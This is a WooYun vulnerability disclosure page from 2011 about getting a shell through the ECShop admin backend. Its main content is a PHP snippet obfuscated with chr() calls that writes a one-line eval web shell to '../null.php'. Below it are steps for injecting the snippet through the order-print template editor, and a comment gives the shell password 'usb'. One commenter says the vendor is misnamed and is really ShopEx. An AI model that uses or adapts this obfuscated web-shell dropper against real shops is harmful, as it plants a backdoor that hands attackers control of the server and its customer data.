当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2011-01636

漏洞标题: ecshop后台获取shell最新方法,通杀最新版本&后台低权限

相关厂商: ecshop

漏洞作者: 路人甲

提交时间: 2011-03-18

公开时间: 2011-03-18

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org

Tags标签: php ecshop 后台权限提升


漏洞详情

披露状态:

2011-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-03-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台可以提交构造代码绕过过滤,成功解析生成一句话木马.

详细说明:

<?php

$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);

$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);

$a=chr(119);

$fp=@fopen($filen,$a);

$msg=@fwrite($fp,$filec);

if($msg) echo chr(79).chr(75).chr(33);

@fclose($fp);

?>


后台-订单管理-订单打印-选择源代码编辑-保存
返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!

漏洞证明:



修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评论

  1. 2011-03-18 13:08 | pg5yl8 ( 普通白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)
    0

    不错 顶顶

  2. 2011-03-18 13:09 | null ( 实习白帽子 | 还没有发布任何漏洞 | 左岸是无法忘却的回忆,右岸是值得把握的青...)
    0

    杯具..我刚提交怎么就公开了 晕死

  3. 2011-03-18 14:22 | null ( 实习白帽子 | 还没有发布任何漏洞 | 左岸是无法忘却的回忆,右岸是值得把握的青...)
    0

    忘记了 一句话密码为usb

  4. 2011-04-23 13:26 | 结界师 (核心白帽子 | Rank:459 漏洞数:21 | 只是另外的一只结界师!)
    0

    你貌似写错了.....后台有点问题,这里厂商是shopex啊

登录后才能发表评论,请先 登录